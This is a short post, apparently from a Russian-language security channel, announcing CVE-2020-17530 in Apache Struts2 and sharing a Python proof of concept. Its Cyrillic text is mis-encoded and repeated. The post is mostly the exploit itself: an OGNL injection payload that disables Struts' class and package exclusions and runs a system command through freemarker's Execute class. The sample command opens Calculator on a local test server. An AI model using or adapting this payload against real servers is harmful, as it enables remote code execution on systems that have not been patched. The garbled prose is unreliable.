𧨠CVE-2020-17530: Π£Π΄Π°Π»ΡΠ½Π½ΠΎΠ΅ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΊΠΎΠ΄Π° Π² Apache Struts2
Π‘ΡΠ΅ΠΏΠ΅Π½Ρ ΡΠ΅ΡΡΠ΅Π·Π½ΠΎΡΡΠΈ - ΠΊΡΠΈΡΠΈΡΠ΅ΡΠΊΠ°Ρ. PoC ΡΡΠ°Π» ΠΎΠ±ΡΠ΅Π΄ΠΎΡΡΡΠΏΠ½ΡΠΌ ΠΈ ΠΌΠΎΠΆΠ΅Ρ ΠΎΠΊΠ°Π·Π°ΡΡ Π·Π½Π°ΡΠΈΡΠ΅Π»ΡΠ½ΠΎΠ΅ ΠΈ ΠΎΠ±ΡΠΈΡΠ½ΠΎΠ΅ Π²Π»ΠΈΡΠ½ΠΈΠ΅. ΠΠ»Ρ ΡΠ΅Ρ , ΠΊΡΠΎ Π½Π΅ ΡΡΠΏΠ΅Π» ΠΎΠ·Π½Π°ΠΊΠΎΠΌΠΈΡΡΡΡ, ΠΊΠΎΠ΄ Π½ΠΈΠΆΠ΅.
Python PoC:
#rce #cve
Π‘ΡΠ΅ΠΏΠ΅Π½Ρ ΡΠ΅ΡΡΠ΅Π·Π½ΠΎΡΡΠΈ - ΠΊΡΠΈΡΠΈΡΠ΅ΡΠΊΠ°Ρ. PoC ΡΡΠ°Π» ΠΎΠ±ΡΠ΅Π΄ΠΎΡΡΡΠΏΠ½ΡΠΌ ΠΈ ΠΌΠΎΠΆΠ΅Ρ ΠΎΠΊΠ°Π·Π°ΡΡ Π·Π½Π°ΡΠΈΡΠ΅Π»ΡΠ½ΠΎΠ΅ ΠΈ ΠΎΠ±ΡΠΈΡΠ½ΠΎΠ΅ Π²Π»ΠΈΡΠ½ΠΈΠ΅. ΠΠ»Ρ ΡΠ΅Ρ , ΠΊΡΠΎ Π½Π΅ ΡΡΠΏΠ΅Π» ΠΎΠ·Π½Π°ΠΊΠΎΠΌΠΈΡΡΡΡ, ΠΊΠΎΠ΄ Π½ΠΈΠΆΠ΅.
Python PoC:
# 2.0.0 ~ 2.5.25
import requests
url = "http://127.0.0.1:8080/struts2_showcase_war/hello.action"
data = {
"name": '%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("/System/Applications/Calculator.app/Contents/MacOS/Calculator")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}'
}
res = requests.post(url, data=data)#rce #cve